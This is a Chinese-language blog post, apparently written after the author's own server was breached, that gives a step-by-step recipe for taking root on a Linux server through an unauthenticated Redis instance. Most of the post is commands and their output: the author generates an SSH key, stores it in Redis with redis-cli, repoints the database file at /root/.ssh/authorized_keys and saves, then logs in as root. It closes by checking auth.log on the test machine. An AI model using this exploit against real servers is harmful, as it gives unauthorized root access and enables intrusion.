MENU

使用redis未授权漏洞入侵Linux服务器

2017 年 05 月 22 日 • 杂乱文章

由于上周我们服务器通过redis被黑掉了,但是我又开始好奇了,究竟是怎么打上来的,要不我也玩玩?哈哈,说搞就搞,然后就在谷歌上各种翻,一翻一堆,然后在某个服务器新装了一个redis,打算就拿他试一下了,看看到底行不行,结果就是还真特么的打上去了,这有点吓人啊,具体怎么搞,操作如下。

1.开始之前要确定两台服务之间没有简历ssh信任关系。

2.在本地生成公钥私钥文件,并将公钥写入key文件。
[root@rj-bai ~]# ssh-keygen -t rsa
[root@rj-bai ~]# (echo -e "\n\n"; cat .ssh/id_rsa.pub; echo -e "\n\n") > key

3.连接redis写入文件,注意,本机必须装有redis才可以。
[root@rj-bai ~]# cat key | redis-cli -h 203.78.0.0 -x set crackit
OK
[root@rj-bai ~]# redis-cli -h 203.78.0.0
203.78.0.0:6379> CONFIG SET dir /root/.ssh/
OK
203.78.0.0:6379> CONFIG GET dir
1) "dir"
2) "/root/.ssh"
203.78.0.0:6379> CONFIG SET dbfilename "authorized_keys"
OK
203.78.0.0:6379> save
OK
203.78.0.0:6379> exit

4.尝试连接目标服务器

没错,现在已经连接上了,以root的身份,到这时候我就想干嘛就干嘛了,然后去看看“被黑”的服务器一些信息。

查看.ssh/authorized_keys文家及服务器登陆日志,这个服务器是debian系统,登陆log是/var/log/auth.log

可以看到公钥已经被添加到authorized_keys文件,使用秘钥登陆服务器的信息也被记录了下来。

最后编辑于: 2018 年 12 月 10 日
返回文章列表 文章二维码 打赏
本页链接的二维码
打赏二维码